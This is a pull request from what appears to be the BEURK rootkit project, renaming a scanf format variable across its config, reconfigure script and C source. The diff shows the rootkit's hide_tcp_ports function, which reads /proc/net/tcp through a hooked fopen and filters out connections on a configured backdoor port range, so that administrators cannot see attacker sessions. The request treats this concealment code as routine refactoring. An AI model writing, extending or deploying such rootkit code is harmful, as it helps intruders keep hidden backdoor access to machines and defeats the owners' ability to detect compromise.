### PR TITLE
refactor(builder): rename ambiguous beurk.conf var

### DIFF
--- a/beurk.conf
+++ b/beurk.conf
@@ -61,7 +61,7 @@ PROC_NET_TCP6 = /proc/net/tcp6
 PROC_PATH = /proc/
 
 # str: scanf fmt string, DO NOT TOUCH
-SCANF_FMT = %d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %512s\n
+SCANF_PROC_NET_TCP = %d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %512s\n
 
 # str: format string for proc/env
 ENV_LINE = %s/environ

--- a/reconfigure
+++ b/reconfigure
@@ -84,7 +84,7 @@ CONFIG_KEYS = {
         "ENV_LINE": type_str,
         "PROC_NET_TCP": type_str,
         "PROC_NET_TCP6": type_str,
-        "SCANF_FMT": type_str,
+        "SCANF_PROC_NET_TCP": type_str,
         }
 
 def get_config(lines, check_missing_vars=True):

--- a/src/hide_tcp_ports.c
+++ b/src/hide_tcp_ports.c
@@ -39,9 +39,9 @@ FILE                *hide_tcp_ports(const char *file) {
     FILE            *pnt = REAL_FOPEN(file, "r");
 
     while (fgets(line, LINE_MAX, pnt)) {
-        sscanf(line, SCANF_FMT, &d, local_addr, &local_port, rem_addr, &rem_port,
-                &state, &txq, &rxq, &timer_run, &time_len, &retr, &uid,
-                &timeout, &inode, more);
+        sscanf(line, SCANF_PROC_NET_TCP, &d, local_addr, &local_port,
+                rem_addr, &rem_port, &state, &txq, &rxq, &timer_run,
+                &time_len, &retr, &uid, &timeout, &inode, more);
         if (rem_port >= LOW_BACKDOOR_PORT && rem_port <= HIGH_BACKDOOR_PORT)
             continue;
         fputs(line, tmp);


### PR DESCRIPTION
the variable `SCANF_FMT` has been renamed into `SCANF_PROC_NET_TCP`,
bacause the old name was too generic to represent its real meaning
